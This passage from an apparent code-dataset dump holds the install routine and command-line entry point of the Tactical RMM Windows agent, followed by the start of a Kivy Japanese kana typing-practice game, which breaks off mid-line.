Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n mesh = os.path.join(self.programdir, self.mesh_installer)\n self.logger.debug(f\"{mesh=}\")\n sys.stdout.flush()\n\n if not self.local_mesh:\n # download mesh agent\n try:\n r = requests.post(\n f\"{self.api}/api/v2/meshexe/\",\n json.dumps({\"arch\": self.arch}),\n headers=token_headers,\n stream=True,\n timeout=90,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(r.json())\n sys.stdout.flush()\n sys.exit(1)\n\n with open(mesh, \"wb\") as f:\n for chunk in 
r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n\n del r\n\n else:\n try:\n shutil.copy2(\n self.local_mesh, os.path.join(self.programdir, self.mesh_installer)\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n # get the agent's token\n try:\n r = requests.post(\n f\"{self.api}/api/v2/newagent/\",\n json.dumps({\"agent_id\": self.agent_id}),\n headers=token_headers,\n timeout=15,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(r.json())\n sys.stdout.flush()\n sys.exit(1)\n\n self.agent_token = r.json()[\"token\"]\n\n # check for existing mesh installations and remove\n meshAgent = MeshAgent(log_level=\"INFO\", log_to=\"stdout\")\n\n if meshAgent.mesh_dir:\n meshAgent.remove_mesh(exe=mesh)\n\n # install mesh\n self.mesh_node_id = meshAgent.install_mesh(\n exe=mesh, cmd_timeout=self.cmd_timeout\n )\n\n self.logger.debug(f\"{self.mesh_node_id=}\")\n sys.stdout.flush()\n\n print(\"Adding agent to dashboard\", flush=True)\n\n payload = {\n \"agent_id\": self.agent_id,\n \"hostname\": self.hostname,\n \"client\": self.client_id,\n \"site\": self.site_id,\n \"mesh_node_id\": self.mesh_node_id,\n \"description\": self.agent_desc,\n \"monitoring_type\": self.agent_type,\n }\n self.logger.debug(payload)\n sys.stdout.flush()\n\n try:\n r = requests.patch(\n f\"{self.api}/api/v2/newagent/\",\n json.dumps(payload),\n headers=token_headers,\n timeout=60,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(r.json())\n sys.stdout.flush()\n sys.exit(1)\n\n self.agent_pk = r.json()[\"pk\"]\n self.salt_id = r.json()[\"saltid\"]\n\n try:\n with db:\n db.create_tables([AgentStorage])\n AgentStorage(\n server=self.api,\n agentid=self.agent_id,\n mesh_node_id=self.mesh_node_id,\n token=self.agent_token,\n agentpk=self.agent_pk,\n salt_master=self.salt_master,\n salt_id=self.salt_id,\n cert=self.cert if self.cert else None,\n ).save()\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n self.load_db()\n\n # install salt, remove any existing installations first\n try:\n oldsalt = psutil.win_service_get(\"salt-minion\")\n except psutil.NoSuchProcess:\n pass\n else:\n print(\"Found existing salt-minion. 
Removing\", flush=True)\n self.uninstall_salt()\n\n print(\"Installing the salt-minion, this might take a while...\", flush=True)\n\n salt_cmd = [\n self.salt_installer,\n \"/S\",\n \"/custom-config=saltcustom\",\n f\"/master={self.salt_master}\",\n f\"/minion-name={self.salt_id}\",\n \"/start-minion=1\",\n ]\n\n try:\n install_salt = subprocess.run(\n salt_cmd, cwd=self.programdir, shell=True, timeout=self.cmd_timeout\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n attempts = 0\n retries = 20\n\n while 1:\n try:\n salt_svc = psutil.win_service_get(\"salt-minion\")\n except psutil.NoSuchProcess:\n self.logger.debug(\"Salt service not installed yet...\")\n sys.stdout.flush()\n attempts += 1\n sleep(5)\n else:\n salt_stat = salt_svc.status()\n if salt_stat != \"running\":\n self.logger.debug(f\"Salt status: {salt_stat}\")\n sys.stdout.flush()\n attempts += 1\n sleep(7)\n else:\n attempts = 0\n\n if attempts == 0:\n break\n elif attempts >= retries:\n self.logger.error(\"Unable to install the salt-minion\")\n self.logger.error(\n f\"Check the log file in {self.system_drive}\\\\salt\\\\var\\\\log\\\\salt\\\\minion\"\n )\n sys.stdout.flush()\n sys.exit(1)\n\n # accept the salt key on the master\n payload = {\"saltid\": self.salt_id, \"agent_id\": self.agent_id}\n accept_attempts = 0\n salt_retries = 20\n\n while 1:\n try:\n r = requests.post(\n f\"{self.api}/api/v2/saltminion/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=35,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.debug(e)\n sys.stdout.flush()\n accept_attempts += 1\n sleep(5)\n else:\n if r.status_code != 200:\n accept_attempts += 1\n self.logger.debug(r.json())\n sys.stdout.flush()\n sleep(5)\n else:\n accept_attempts = 0\n\n if accept_attempts == 0:\n self.logger.debug(r.json())\n sys.stdout.flush()\n break\n elif accept_attempts >= salt_retries:\n self.logger.error(\"Unable to register salt with the RMM\")\n self.logger.error(\"Installation failed\")\n sys.stdout.flush()\n sys.exit(1)\n\n sleep(10)\n\n # sync salt modules\n self.logger.debug(\"Syncing salt modules\")\n sys.stdout.flush()\n\n sync_attempts = 0\n sync_retries = 20\n\n while 1:\n try:\n r = requests.patch(\n f\"{self.api}/api/v2/saltminion/\",\n json.dumps({\"agent_id\": self.agent_id}),\n headers=self.headers,\n timeout=30,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.debug(e)\n sys.stdout.flush()\n sync_attempts += 1\n sleep(5)\n else:\n if r.status_code != 200:\n sync_attempts += 1\n self.logger.debug(r.json())\n sys.stdout.flush()\n sleep(5)\n else:\n sync_attempts = 0\n\n if sync_attempts == 0:\n self.logger.debug(r.json())\n sys.stdout.flush()\n break\n elif sync_attempts >= sync_retries:\n self.logger.error(\"Unable to sync salt modules\")\n self.logger.error(\"Installation failed\")\n sys.stdout.flush()\n sys.exit(1)\n\n sleep(10) # wait a bit for modules to fully sync\n\n self.send_system_info()\n\n # create the scheduled tasks\n try:\n self.create_fix_salt_task()\n self.create_fix_mesh_task()\n except Exception as e:\n self.logger.debug(e)\n sys.stdout.flush()\n\n # remove services if they exists\n try:\n tac = psutil.win_service_get(\"tacticalagent\")\n except psutil.NoSuchProcess:\n pass\n else:\n print(\"Found tacticalagent service. 
Removing...\", flush=True)\n subprocess.run([self.nssm, \"stop\", \"tacticalagent\"], capture_output=True)\n subprocess.run(\n [self.nssm, \"remove\", \"tacticalagent\", \"confirm\"], capture_output=True\n )\n\n try:\n chk = psutil.win_service_get(\"checkrunner\")\n except psutil.NoSuchProcess:\n pass\n else:\n print(\"Found checkrunner service. Removing...\", flush=True)\n subprocess.run([self.nssm, \"stop\", \"checkrunner\"], capture_output=True)\n subprocess.run(\n [self.nssm, \"remove\", \"checkrunner\", \"confirm\"], capture_output=True\n )\n\n # install the windows services\n print(\"Installing services...\", flush=True)\n svc_commands = [\n [\n self.nssm,\n \"install\",\n \"tacticalagent\",\n self.exe,\n \"-m\",\n \"winagentsvc\",\n ],\n [self.nssm, \"set\", \"tacticalagent\", \"DisplayName\", r\"Tactical RMM Agent\"],\n [self.nssm, \"set\", \"tacticalagent\", \"Description\", r\"Tactical RMM Agent\"],\n [self.nssm, \"start\", \"tacticalagent\"],\n [\n self.nssm,\n \"install\",\n \"checkrunner\",\n self.exe,\n \"-m\",\n \"checkrunner\",\n ],\n [\n self.nssm,\n \"set\",\n \"checkrunner\",\n \"DisplayName\",\n r\"Tactical RMM Check Runner\",\n ],\n [\n self.nssm,\n \"set\",\n \"checkrunner\",\n \"Description\",\n r\"Tactical RMM Check Runner\",\n ],\n [self.nssm, \"start\", \"checkrunner\"],\n ]\n\n for cmd in svc_commands:\n subprocess.run(cmd, capture_output=True)\n\n if self.disable_power:\n print(\"Disabling sleep/hibernate...\", flush=True)\n try:\n disable_sleep_hibernate()\n except:\n pass\n\n if self.enable_rdp:\n print(\"Enabling RDP...\", flush=True)\n try:\n enable_rdp()\n except:\n pass\n\n if self.enable_ping:\n print(\"Enabling ping...\", flush=True)\n try:\n enable_ping()\n except:\n pass\n\n print(\"Installation was successfull!\", flush=True)\n print(\n \"Allow a few minutes for the agent to properly display in the RMM\",\n flush=True,\n )\n sys.exit(0)\n" }, { "alpha_fraction": 0.5398335456848145, "alphanum_fraction": 0.5412604212760925, "avg_line_length": 30.263940811157227, "blob_id": "b0fbe398dec01bd1eba911c766344decd0212381", "content_id": "b04b3370f9cb64443cf565126c9ad5d042d6277a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8410, "license_type": "permissive", "max_line_length": 132, "num_lines": 269, "path": "/winagent/tacticalrmm.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport socket\nimport sys\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Tactical RMM Agent\")\n parser.add_argument(\"-m\", action=\"store\", dest=\"mode\", type=str)\n parser.add_argument(\"-p\", action=\"store\", dest=\"taskpk\", type=int)\n parser.add_argument(\"--api\", action=\"store\", dest=\"api_url\", type=str)\n parser.add_argument(\"--client-id\", action=\"store\", dest=\"client_id\", type=int)\n parser.add_argument(\"--site-id\", action=\"store\", dest=\"site_id\", type=int)\n parser.add_argument(\"--timeout\", action=\"store\", dest=\"cmd_timeout\", type=int)\n parser.add_argument(\n \"--desc\",\n action=\"store\",\n dest=\"agent_desc\",\n type=str,\n default=socket.gethostname(),\n )\n parser.add_argument(\n \"--agent-type\",\n action=\"store\",\n dest=\"agent_type\",\n type=str,\n default=\"server\",\n choices=[\"server\", \"workstation\"],\n )\n parser.add_argument(\n \"-l\",\n \"--log\",\n action=\"store\",\n dest=\"log_level\",\n type=str,\n default=\"INFO\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", 
\"CRITICAL\"],\n )\n parser.add_argument(\n \"--logto\",\n action=\"store\",\n dest=\"log_to\",\n type=str,\n default=\"file\",\n choices=[\"file\", \"stdout\"],\n )\n parser.add_argument(\"--auth\", action=\"store\", dest=\"auth_token\", type=str)\n parser.add_argument(\"--version\", action=\"store_true\")\n parser.add_argument(\"--power\", action=\"store_true\")\n parser.add_argument(\"--rdp\", action=\"store_true\")\n parser.add_argument(\"--ping\", action=\"store_true\")\n parser.add_argument(\n \"--local-salt\",\n action=\"store\",\n dest=\"local_salt\",\n type=str,\n help=r'The full path to the salt-minion executable e.g. \"C:\\\\temp\\\\salt-minion-setup.exe\"',\n )\n parser.add_argument(\n \"--local-mesh\",\n action=\"store\",\n dest=\"local_mesh\",\n type=str,\n help=r'The full path to the Mesh Agent executable e.g. \"C:\\\\temp\\\\meshagent.exe\"',\n )\n parser.add_argument(\n \"--cert\",\n action=\"store\",\n dest=\"cert\",\n type=str,\n help=r'The full path to the local cert e.g. \"C:\\\\temp\\\\ca.pem\"',\n )\n args = parser.parse_args()\n\n if args.version:\n from utils import show_version_info\n\n show_version_info()\n\n elif args.mode == \"install\":\n\n if (\n not args.api_url\n or not args.client_id\n or not args.site_id\n or not args.auth_token\n ):\n parser.print_help()\n sys.exit(1)\n\n if args.local_salt:\n if not os.path.exists(args.local_salt):\n parser.print_help()\n sys.stdout.flush()\n print(f\"\\nError: {args.local_salt} does not exist\\n\", flush=True)\n sys.exit(1)\n if not os.path.isfile(args.local_salt):\n parser.print_help()\n sys.stdout.flush()\n print(\n f\"\\nError: {args.local_salt} must be a file, not a folder.\",\n flush=True,\n )\n print(\n r'Make sure to use double backslashes for file paths, and double quotes e.g. \"C:\\\\temp\\\\salt-minion-setup.exe\"',\n flush=True,\n )\n print(\"\", flush=True)\n sys.exit(1)\n\n if args.local_mesh:\n if not os.path.exists(args.local_mesh):\n parser.print_help()\n sys.stdout.flush()\n print(f\"\\nError: {args.local_mesh} does not exist\\n\", flush=True)\n sys.exit(1)\n if not os.path.isfile(args.local_mesh):\n parser.print_help()\n sys.stdout.flush()\n print(\n f\"\\nError: {args.local_mesh} must be a file, not a folder.\",\n flush=True,\n )\n print(\n r'Make sure to use double backslashes for file paths, and double quotes e.g. \"C:\\\\temp\\\\meshagent.exe\"',\n flush=True,\n )\n print(\"\", flush=True)\n sys.exit(1)\n\n if args.cert:\n if not os.path.exists(args.cert):\n parser.print_help()\n sys.stdout.flush()\n print(f\"\\nError: {args.cert} does not exist\\n\", flush=True)\n sys.exit(1)\n if not os.path.isfile(args.cert):\n parser.print_help()\n sys.stdout.flush()\n print(\n f\"\\nError: {args.cert} must be a file, not a folder.\",\n flush=True,\n )\n print(\n r'Make sure to use double backslashes for file paths, and double quotes e.g. 
\"C:\\\\temp\\\\ca.pem\"',\n flush=True,\n )\n print(\"\", flush=True)\n sys.exit(1)\n\n from installer import Installer\n\n installer = Installer(\n api_url=args.api_url,\n client_id=args.client_id,\n site_id=args.site_id,\n agent_desc=args.agent_desc,\n agent_type=args.agent_type,\n power=args.power,\n rdp=args.rdp,\n ping=args.ping,\n auth_token=args.auth_token,\n log_level=args.log_level,\n local_salt=args.local_salt,\n local_mesh=args.local_mesh,\n cert=args.cert,\n cmd_timeout=args.cmd_timeout,\n )\n\n installer.install()\n\n elif args.mode == \"winagentsvc\":\n from winagentsvc import WinAgentSvc\n\n agent = WinAgentSvc(log_level=args.log_level, log_to=args.log_to)\n agent.run()\n\n elif args.mode == \"checkrunner\":\n from checkrunner import CheckRunner\n\n agent = CheckRunner(log_level=args.log_level, log_to=args.log_to)\n agent.run_forever()\n\n elif args.mode == \"runchecks\":\n from checkrunner import CheckRunner\n\n agent = CheckRunner(log_level=args.log_level, log_to=args.log_to)\n agent.run()\n\n elif args.mode == \"winupdater\":\n from winupdater import WinUpdater\n\n agent = WinUpdater(log_level=args.log_level, log_to=args.log_to)\n agent.install_all()\n\n elif args.mode == \"patchscan\":\n from winupdater import WinUpdater\n\n agent = WinUpdater(log_level=args.log_level, log_to=args.log_to)\n agent.trigger_patch_scan()\n\n elif args.mode == \"taskrunner\":\n from taskrunner import TaskRunner\n\n agent = TaskRunner(\n task_pk=args.taskpk, log_level=args.log_level, log_to=args.log_to\n )\n agent.run()\n\n elif args.mode == \"sysinfo\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.send_system_info()\n\n elif args.mode == \"updatesalt\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.update_salt()\n\n elif args.mode == \"fixsalt\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.fix_salt()\n\n elif args.mode == \"fixmesh\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.fix_mesh()\n\n elif args.mode == \"cleanup\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.fix_salt(by_time=False)\n agent.cleanup()\n\n elif args.mode == \"recoversalt\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.recover_salt()\n\n elif args.mode == \"recovermesh\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.recover_mesh()\n\n else:\n import win32gui\n\n from agent import show_agent_status\n\n window = win32gui.GetForegroundWindow()\n\n if window == 0:\n # called from cli with no interactive desktop\n show_agent_status(window=None, gui=False)\n else:\n show_agent_status(window=window, gui=True)\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
12
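The `run_checks()` coroutine in the checkrunner.py file of the record above walks an if/elif chain to turn each check dict into a coroutine, then runs the whole batch concurrently with `asyncio.gather`. Below is a minimal, self-contained sketch of that dispatch pattern; the handler coroutines and check payloads are hypothetical stand-ins, not the agent's real implementations.

```python
import asyncio

# Hypothetical stand-ins for the agent's check coroutines (cpu_load_check,
# ping_check, ...); each sleeps briefly instead of doing real work.
async def cpu_load_check(check: dict) -> None:
    await asyncio.sleep(0.1)
    print(f"cpuload check {check['id']} finished")

async def ping_check(check: dict) -> None:
    await asyncio.sleep(0.1)
    print(f"ping check {check['id']} finished")

# Table-driven dispatch: one entry per check_type, instead of the elif chain.
HANDLERS = {
    "cpuload": cpu_load_check,
    "ping": ping_check,
}

async def run_checks(data: dict) -> None:
    # Same shape as the agent code: build one task per known check, gather all.
    tasks = [
        HANDLERS[check["check_type"]](check)
        for check in data["checks"]
        if check["check_type"] in HANDLERS
    ]
    await asyncio.gather(*tasks)

if __name__ == "__main__":
    asyncio.run(run_checks({"checks": [
        {"id": 1, "check_type": "cpuload"},
        {"id": 2, "check_type": "ping"},
    ]}))
```

A mapping keeps the dispatch in one place as check types grow, though the original's explicit branches read just as clearly at seven cases.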
lxin/jptest
https://github.com/lxin/jptest
4c45c4ad6ba047d4bccfb3fd566e58557ff924a0
ab0014b6b11afba052174b31873ec44d0d566c91
477ba53da788fcca75fd0983a0533d631f0e79b1
refs/heads/master
2020-03-30T13:32:53.180610
2018-10-13T08:00:48
2018-10-13T08:00:48
151,276,993
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5404970049858093, "alphanum_fraction": 0.5684815049171448, "avg_line_length": 38.82149124145508, "blob_id": "9fdf299d20f7cbab6ce7a360691c1d888f15c7af", "content_id": "caee5a52b75e8cec5049672a4705f00e112cc355", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22993, "license_type": "no_license", "max_line_length": 122, "num_lines": 577, "path": "/main.py", "repo_name": "lxin/jptest", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\nimport random, time, copy, os, pickle\nos.environ['KIVY_AUDIO'] = 'sdl2'\n\nimport kivy\nkivy.require('1.0.7')\n\nfrom kivy.config import Config\n\nfrom kivy.core.window import Window\nscale = kivy.metrics.sp(1)\ndef dp(v): return (v * scale) / 2\nWindow.size = (800, 600)\nWindow.clearcolor = (0.3, 0.3, 0.1, 0.3)\n\nfrom kivy.animation import Animation\nfrom kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.popup import Popup\nfrom kivy.core.window import Window, Keyboard\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.label import Label\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.core.audio import SoundLoader\nfrom kivy.uix.image import Image\nfrom kivy.uix.stacklayout import StackLayout\nfrom kivy.properties import NumericProperty\n\nfrom modules import jpmap\njp_maps=(jpmap.jp_map_h, jpmap.jp_map_k, jpmap.jp_map_t)\n\ntitle='Hiragana/Katakana Testing'\nconfs=(60, 0, 0, 1, 1, 30, 5, 6) # (time, character, mode, cheat, size, delay, flakes)\n\nbt_img='sources/btn.png'\nbg_img='sources/bg.jpg'\nbg_sound='sources/bg.wav'\nshot_sound='sources/sliencer.wav'\nmiss_sound='sources/reload.wav'\nconf_path=os.getenv(\"HOME\")+'/jptest.conf'\nextmap_path=os.getenv(\"HOME\")+'/jp_ext.map'\n\nfont_name='sources/DroidSansFallback'\nhelp_font='sources/CourierNew'\nflake_colors=((0.1,1,1,.7), (1,0.1,1,.7), (1,1,0.1,.7),\n(0.5,1,0.5,.7), (0.5,0.5,1,.7), (1,0.5,0.5,.7))\nbullet_color=(0,0,0,0)\nsize_hint=(None, None)\nflake_shape=\"♥\" #\"✿\" #\"♥\", #\"❤\"\nflake_shape_v=\"❃\" #\"✿\" #\"♥\", #\"❤\"\nflake_shapes=[flake_shape, flake_shape_v]\nanimation_char_type=\"in_out_quart\"\n\ntime_limit_mode=0\nchar_limit_mode=1\nlong_limit_mode=2\n\nextmap_index=-1\n\nheart_scale=[(0, 0.7 + 0),(0.15, 0.7 + 0.18), (0.30, 0.7 + 0.15),\n (0.45, 0.7 + 0),(0.60, 0.7 + 0.15), (0.75, 0.7 + 0.18),\n (0.90, 0.7 + 0),(0.60, 0.7 - 0.40), (0.75, 0.7 - 0.20),\n (0.45, 0.7-0.6),(0.30, 0.7 - 0.40), (0.15, 0.7 - 0.20)]\n\na_scale=[(0.1, 0.4),(0.1, 0.6), (0.1, 0.8),\n (0.2, 1.0),(0.3, 1.0), (0.4, 0.8),\n (0.4, 0.6),(0.4, 0.4), (0.3, 0.3),\n (0.2, 0.2),(0.45,0.3), (0.45,0.3)]\n\nk_scale=[(0.2,0.15),(0.2, 0.3), (0.2, 0.45),\n (0.2, 0.6),(0.2, 0.75), (0.2, 0.9),\n (0.5,0.15),(0.4, 0.25), (0.3, 0.35),\n (0.3, 0.6),(0.4, 0.7), (0.5, 0.8)]\n\ni_scale=[(0.3,0.2), (0.3, 0.3), (0.3, 0.4),\n (0.3,0.5), (0.3, 0.6), (0.3, 0.7),\n (0.3,0.8), (0.3, 0.95),(0.15, 0.7),\n (0.2,0.775),(0.4,0.225),(0.45, 0.3)]\n\ns_scale=[(0.1, 0.1),(0.2, 0.1), (0.3, 0.1),\n (0.4, 0.2),(0.45,0.3), (0.4, 0.4),\n (0.3, 0.5),(0.2, 0.6), (0.15, 0.7),\n (0.2, 0.8),(0.3, 0.9), (0.45, 0.9)]\n\nhelp_info=\\\n\"\"\"\nHelp:\n1. system commands: help, exit, setup, ... 
(you can type once the app starts)\n * help: it comes to this page\n * exit: close the window\n * setup: you would be able to see a textinput box:\n Time | Alphabet | Mode | Cheat | Speed | FontSize | Delay | Flakes:\n 60, 0, 0, 1, 1, 30, 5, 6\n - Time: 1-n => the certain time, see Mode 0\n - Alphabet: 0 => hiragana 1 => katakana 2 => kanji\n -1 => load the user-defined map from \"\"\"+extmap_path+\"\"\"\n - Mode: 0 => count the character number in a certain time\n 1 => count the time after you finish all characters\n 2 => shoot all before any flakes touch the bottom\n - Cheat: 0 => disable the prompt by clicking the flakes\n 1 => enable the prompt by clicking the flakes\n - Speed: 1-n => flakes fall faster as the value gets bigger\n - FontSize: 1-n => the font size on each flake\n - Delay: 0 => no animation delay, shoot extremely fast\n 1-n => the animation duration for shooting\n - Flakes:1-n => the number of the Flakes\n * ...: others would be matched with the flakes\n2. clicks: on-flakes, on-bullet\n * on-flakes: show the prompt if Cheat is enabled\n * on-bullet: it comes to this page, as help cmd does\n\nCopyright:\n Powered By : Xin Long <[email protected]>\n Source Code : https://github.com/lxin/jptest\n\"\"\"\nclass JPTest(App, Widget):\n def get_conf_flakes(self): return self.confs[7]\n def get_conf_delay(self):\n if self.get_conf_char() == 2: # important to author\n return random.randint(10, 20)\n return self.confs[6]\n\n def get_conf_fsize(self): return self.confs[5]\n def get_conf_speed(self): return self.confs[4]\n def get_conf_prompt(self): return self.confs[3]\n def get_conf_mode(self): return self.confs[2]\n def get_conf_char(self): return self.confs[1]\n def get_conf_time(self): return self.confs[0]\n\n def get_conf_all(self):\n return ', '.join([str(i) for i in self.confs])\n\n def get_stat_stime(self): return self.stats[0]\n def get_stat_pass(self): return self.stats[1]\n def get_stat_fail(self): return self.stats[2]\n def get_stat_ctime(self): return self.stats[3]\n\n def set_stat_stime(self, val): self.stats[0] = val\n def set_stat_pass(self, val): self.stats[1] = val\n def set_stat_fail(self, val): self.stats[2] = val\n def set_stat_ctime(self, val): self.stats[3] = val\n\n def get_stat_all(self):\n return 'Time: {}, Pass: {}, Fail: {}'.format(self.get_stat_ctime(),\n self.get_stat_pass(), self.get_stat_fail())\n\n def keyboard_closed(self):\n pass\n\n def on_window_resize(self, window, width, height):\n self.reset_stats(True)\n\n def setup_press(self, instance):\n try:\n text = instance.setup_input.text\n newconfs = ()\n newconfs = tuple(int(i) for i in text.split(','))\n finally:\n if len(newconfs) != len(self.confs):\n instance.setup_input.text = self.get_conf_all()\n return\n try:\n self.confs=newconfs\n pickle.dump(self.confs, open(conf_path,'wb'))\n finally:\n self.reset_stats(instance)\n\n def reset_widgets(self, instance = None):\n self.win_width = Window.size[0]\n self.win_height = Window.size[1]\n\n self.popup_font_size= self.win_width / 53\n self.flake_font_size= self.win_width / 53 # not used\n self.label_font_size= self.win_width / 80\n self.input_font_size= self.win_width / 45\n self.help_font_size= self.win_height/ 60\n self.box_padding= self.win_width / 160\n self.box_input_padding= self.win_width / 80\n\n for widget in self.layout.walk(restrict=True):\n self.layout.remove_widget(widget)\n\n self.layout.add_widget(Image(source=bg_img, allow_stretch=True))\n self.buttons = []\n for i in range(self.get_conf_flakes()):\n bullet = self.create_bullet()\n 
button = self.create_flake(i, bullet)\n button.index = i\n self.layout.add_widget(bullet)\n self.layout.add_widget(button)\n\n self.layout.add_widget(self.create_bullet(bt_img))\n self.layout.add_widget(self.create_cmdline())\n\n def reset_stats(self, instance = None):\n self.stats=[time.time(), 0, 0, self.get_conf_time()]\n try:\n if self.get_conf_char() == extmap_index:\n newmap = eval(open(extmap_path,'rb').read())\n else:\n newmap = jp_maps[self.get_conf_char()]\n except:\n newmap = {}\n self.jp_map=copy.deepcopy(newmap)\n\n self.no_keys=0\n self.heart_bullet = 0\n if not instance:\n return True\n\n if self.popup:\n self.popup.dismiss()\n self.popup=None\n\n self.sounds[2].play()\n self.reset_widgets()\n\n\n def close_window(self, instance):\n self.stop()\n\n def on_keyboard_down(self, keyboard, keycode, text, modifiers):\n if self.popup:\n return True\n\n if (keycode[1] == 'enter'):\n if self.textinput.text == \"exit\":\n self.stop()\n return True\n if self.textinput.text == \"help\":\n self.help_press()\n return True\n if self.textinput.text == \"setup\":\n self.confs_press()\n return True\n\n for b in self.buttons:\n if (self.textinput.text == b.kv_key or (('_') in b.kv_key and \\\n self.textinput.text == b.kv_key.split('_')[1])) and b.opacity:\n if self.get_conf_delay():\n b.bullet.background_color = b.background_color\n b.bullet.text = self.textinput.text\n self.animate_bullet(b.bullet)\n else:\n self.sounds[0].play()\n b.opacity = 0\n\n self.set_stat_pass(self.get_stat_pass() + 1)\n self.textinput.text=\"\"\n return True\n\n self.set_stat_fail(self.get_stat_fail() + 1)\n self.sounds[1].play()\n self.textinput.text=\"\"\n return True\n\n if not self.textinput.focus:\n self.textinput.focus=True\n if keycode[0] < 256:\n self.textinput.text+=chr(keycode[0])\n return True\n\n return True\n\n def animate_flake_restart(self, animation, instance):\n if instance not in self.buttons:\n return True\n\n if instance.opacity == 0:\n instance.opacity = 1\n self.set_random_char(instance)\n\n instance.pos[1]=self.win_height # width should be updated and size more !\n self.animate_flake(instance)\n\n if self.popup:\n return True\n\n time_gap = int(time.time() - self.get_stat_stime())\n if (self.get_conf_mode() == char_limit_mode and self.no_keys >= self.get_conf_flakes()) \\\n or (self.get_conf_mode() == long_limit_mode and instance.opacity == 1) \\\n or ( self.get_conf_mode() == time_limit_mode and time_gap >= self.get_stat_ctime()):\n self.set_stat_ctime(time_gap)\n else:\n if self.get_conf_char() == 2: # important to author\n if self.heart_bullet >= 100 and self.heart_bullet <= 112:\n if self.heart_bullet == 100:\n for b in self.buttons:\n if not b.opacity:\n return True\n for b in self.buttons:\n if self.get_conf_delay():\n b.bullet.background_color = b.background_color\n b.bullet.text = flake_shape\n self.animate_bullet(b.bullet)\n self.heart_bullet += 1\n\n if self.heart_bullet or self.get_conf_flakes() != 12:\n return True\n\n self.heart_bullet = 1\n for b in self.buttons:\n b.bullet.background_color = b.background_color\n b.bullet.text = flake_shape_v\n self.animate_heart_bullet(b.bullet)\n\n return True\n\n box = BoxLayout(orientation = 'vertical', padding = (self.box_padding))\n box.add_widget(Label(text = self.get_stat_all(), size_hint=(1, 0.4)))\n box.add_widget(Button(text = \"restart\", size_hint=(1, 0.3), on_press=self.reset_stats))\n box.add_widget(Button(text = \"exit\", size_hint=(1, 0.3), on_press=self.close_window))\n self.popup = Popup(title='Result', title_size= 
self.popup_font_size, title_align = 'center', auto_dismiss = False,\n content = box, size_hint=size_hint, size=(self.win_width / 3, self.win_height / 3))\n self.popup.open()\n self.sounds[2].stop()\n\n def animate_heart_bullet_x_complete(self, animation, instance): # important to author\n instance.text = flake_shape\n self.animate_bullet_x(instance)\n\n def animate_heart_bullet_x(self, animation, instance): # important to author\n animation = Animation(pos=instance.pos)\n index = (instance.button.index + 1) % 12\n animation += Animation(pos=self.buttons[index].bullet.pos, duration=5, t=\"out_circ\")\n animation.bind(on_complete=self.animate_heart_bullet_x_complete)\n animation.start(instance)\n\n def animate_heart_bullet(self, instance): # important to author\n animation = Animation(pos=instance.pos)\n pos_scale = tuple(i*2/3 for i in s_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=2, t=animation_char_type)\n\n pos_scale = tuple(i/2 for i in a_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height + self.win_width/4,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=1.5, t=animation_char_type)\n\n pos_scale = tuple(i*2/3 for i in k_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height + self.win_width*2/4,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=1.5, t=animation_char_type)\n\n pos_scale = tuple(i/2 for i in i_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height + self.win_width*3/4,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=1.5, t=animation_char_type)\n\n pos_scale = heart_scale[instance.button.index]\n pos = (pos_scale[0] * self.win_height*2/5,\n pos_scale[1] * self.win_height *2/5 + self.win_height/5)\n animation += Animation(pos=pos, duration=2, t=\"out_bounce\")\n\n pos_scale = heart_scale[instance.button.index]\n pos_offset = heart_scale[6][0] * self.win_height\n pos 